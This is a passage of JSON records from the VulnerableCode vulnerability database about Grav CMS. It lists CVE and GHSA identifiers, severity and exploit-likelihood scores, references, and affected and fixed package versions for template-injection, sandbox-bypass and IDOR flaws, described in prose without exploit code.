                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66296",
                "GHSA-cjcp-qxvg-4rjm"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fmmu-r77k-c7g2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45432?format=api",
            "vulnerability_id": "VCID-jsuh-8ssu-gfh3",
            "summary": "Improper Control of Generation of Code ('Code Injection')\nGrav is a flat-file content management system. Prior to version 1.7.42, the patch for CVE-2022-2073, a server-side template injection vulnerability in Grav leveraging the default `filter()` function, does not block other built-in functions exposed by Twig's Core Extension that could be used to invoke arbitrary unsafe functions, thereby allowing for remote code execution. A patch in version 1.74.2 overrides the built-in Twig `map()` and `reduce()` filter functions in `system/src/Grav/Common/Twig/Extension/GravExtension.php` to validate the argument passed to the filter in `$arrow`.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34448",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.08847",
                            "scoring_system": "epss",
                            "scoring_elements": "0.92701",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34448"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
                },
                {
                    "reference_url": "https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"
                        }
                    ],
                    "url": "https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148"
                },
                {
                    "reference_url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66"
                },
                {
                    "reference_url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"
                        }
                    ],
                    "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"
                },
                {
                    "reference_url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"
                        }
                    ],
                    "url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34448",
                    "reference_id": "CVE-2023-34448",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34448"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-whr7-m3f8-mpm8",
                    "reference_id": "GHSA-whr7-m3f8-mpm8",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-whr7-m3f8-mpm8"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-whr7-m3f8-mpm8",
                    "reference_id": "GHSA-whr7-m3f8-mpm8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-whr7-m3f8-mpm8"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/65586?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.42",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ps5-3k43-p3fa"
                        },
                        {
                            "vulnerability": "VCID-4a2z-37a3-2qaw"
                        },
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-7jaz-7xjc-kka1"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-a8y8-y4zt-zqbv"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-bwvg-jg4z-nyhp"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-ru55-uj84-p3dr"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-yh73-zyju-vqge"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        },
                        {
                            "vulnerability": "VCID-zg5t-uqx2-87fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42"
                }
            ],
            "aliases": [
                "CVE-2023-34448",
                "GHSA-whr7-m3f8-mpm8"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jsuh-8ssu-gfh3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49332?format=api",
            "vulnerability_id": "VCID-k8fd-bqpk-2qg8",
            "summary": "Grav vulnerable to Information Disclosure via IDOR in Grav Admin Panel\nAn **IDOR (Insecure Direct Object Reference)** vulnerability in the Grav CMS Admin Panel allows **low-privilege users to access sensitive information** from other accounts.\nAlthough direct account takeover is not possible, **admin email addresses and other metadata can be exposed**, increasing the risk of phishing, credential stuffing, and social engineering.\n\n---",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66306",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00045",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14231",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66306"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/b7e1958a6e807ac14919447b60e5204a2ea77f62",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:11:21Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/b7e1958a6e807ac14919447b60e5204a2ea77f62"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66306",
                    "reference_id": "CVE-2025-66306",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66306"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4cwq-j7jv-qmwg",
                    "reference_id": "GHSA-4cwq-j7jv-qmwg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4cwq-j7jv-qmwg"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg",
                    "reference_id": "GHSA-4cwq-j7jv-qmwg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:11:21Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66306",
                "GHSA-4cwq-j7jv-qmwg"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k8fd-bqpk-2qg8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49317?format=api",
            "vulnerability_id": "VCID-kbnn-6uws-kqh9",
            "summary": "Grav is Vulnerable to Security Sandbox Bypass with SSTI (Server Side Template Injection)\nGrav CMS is vulnerable to a Server-Side Template Injection (SSTI) that allows any authenticated user with editor permissions to execute arbitrary code on the remote server, bypassing the existing security sandbox.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66299",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00154",
                            "scoring_system": "epss",
                            "scoring_elements": "0.35852",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66299"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:07:46Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66299",
                    "reference_id": "CVE-2025-66299",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66299"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gjc5-8cfh-653x",
                    "reference_id": "GHSA-gjc5-8cfh-653x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gjc5-8cfh-653x"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-gjc5-8cfh-653x",
                    "reference_id": "GHSA-gjc5-8cfh-653x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:07:46Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-gjc5-8cfh-653x"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66299",
                "GHSA-gjc5-8cfh-653x"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kbnn-6uws-kqh9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45431?format=api",
            "vulnerability_id": "VCID-m1sj-emwx-5fek",
            "summary": "Improper Control of Generation of Code ('Code Injection')\nGrav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34251",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.02554",
                            "scoring_system": "epss",
                            "scoring_elements": "0.85799",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34251"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
